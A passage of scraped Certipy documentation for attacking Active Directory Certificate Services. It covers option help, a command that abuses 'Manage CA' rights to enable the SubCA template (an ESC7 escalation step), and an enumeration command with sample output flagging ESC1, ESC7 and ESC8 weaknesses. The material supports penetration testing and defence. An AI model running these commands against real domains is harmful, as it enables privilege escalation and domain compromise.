Enrollment instead of RPC -dcom Use DCOM Enrollment instead of RPC -dc-ip ip address IP address of the domain controller. If omitted, it will use the domain part (FQDN) specified in the target parameter -dc-host hostname Hostname of the domain controller. Required for Kerberos authentication during certain operations. If omitted, the domain part (FQDN) specified in the account parameter will be used -target-ip ip address IP address of the target machine. If omitted, it will use whatever was specified as target. Useful when target is the NetBIOS name and cannot be resolved -target dns/ip address DNS name or IP address of the target machine. Required for Kerberos authentication -ns ip address Nameserver for DNS resolution -dns-tcp Use TCP instead of UDP for DNS queries -timeout seconds Timeout for connections in seconds (default: 10) rpc connection options: -dynamic-endpoint Prefer dynamic TCP endpoint over named pipe http connection options: -http-scheme http scheme HTTP scheme to use for Web Enrollment (default: http) -http-port port number Web Enrollment port (default: 80 for http, 443 for https) -no-channel-binding Disable channel binding for HTTP connections authentication options: -u username@domain, -username username@domain Username to authenticate with -p password, -password password Password for authentication -hashes [lmhash:]nthash NTLM hash ``` -------------------------------- ### Clone Certipy Wiki Repository Source: https://github.com/ly4k/certipy/blob/main/CONTRIBUTING.md Clones the wiki repository to allow for local editing of documentation files. ```bash git clone https://github.com/ly4k/Certipy.wiki.git ``` -------------------------------- ### Enable SubCA Template on CA Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Uses 'Manage CA' privilege to publish the 'SubCA' template, making it available for certificate requests. ```bash certipy ca \ -u 'attacker@corp.local' -p 'Passw0rd!' \ -ns '10.0.0.100' -target 'CA.CORP.LOCAL' \ -ca 'CORP-CA' -enable-template 'SubCA' ``` -------------------------------- ### Enumerate AD CS Configurations Source: https://github.com/ly4k/certipy/wiki/05-‐-Usage Use 'certipy find' to discover vulnerable Certificate Templates and Certificate Authority (CA) configurations. This command queries LDAP and outputs details about templates, CA settings, and potential vulnerabilities like ESC1, ESC7, and ESC8. The -hide-admins flag can be used to reduce noise in the output. ```bash certipy find \ -u 'attacker@corp.local' -p 'Passw0rd!' \ -dc-ip '10.0.0.100' -text \ -enabled -hide-admins ``` ```text Certificate Authorities 0 CA Name : CORP-CA DNS Name : CA.CORP.LOCAL ... Web Enrollment HTTP Enabled : False HTTPS Enabled : True Channel Binding (EPA) : False ... Permissions Access Rights ManageCa : CORP.LOCAL\Authenticated Users ManageCertificates : CORP.LOCAL\Authenticated Users Read : CORP.LOCAL\Authenticated Users Enroll : CORP.LOCAL\Authenticated Users [+] User Enrollable Principals : CORP.LOCAL\Authenticated Users [+] User ACL Principals : CORP.LOCAL\Authenticated Users [!] Vulnerabilities ESC7 : User has dangerous permissions. ESC8 : Web Enrollment is enabled over HTTPS and Channel Binding is disabled. Certificate Templates 0 Template Name : UserTemplate Display Name : UserTemplate Certificate Authorities : CORP-CA Enabled : True Client Authentication : True ... Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Extended Key Usage : Client Authentication ... Permissions Enrollment Permissions Enrollment Rights : CORP.LOCAL\Domain Users Object Control Permissions Write Property Enroll : CORP.LOCAL\Domain Users [+] User Enrollable Principals : CORP.LOCAL\Domain Users [!] Vulnerabilities ESC1 : Enrollee supplies subject and template allows client authentication. ```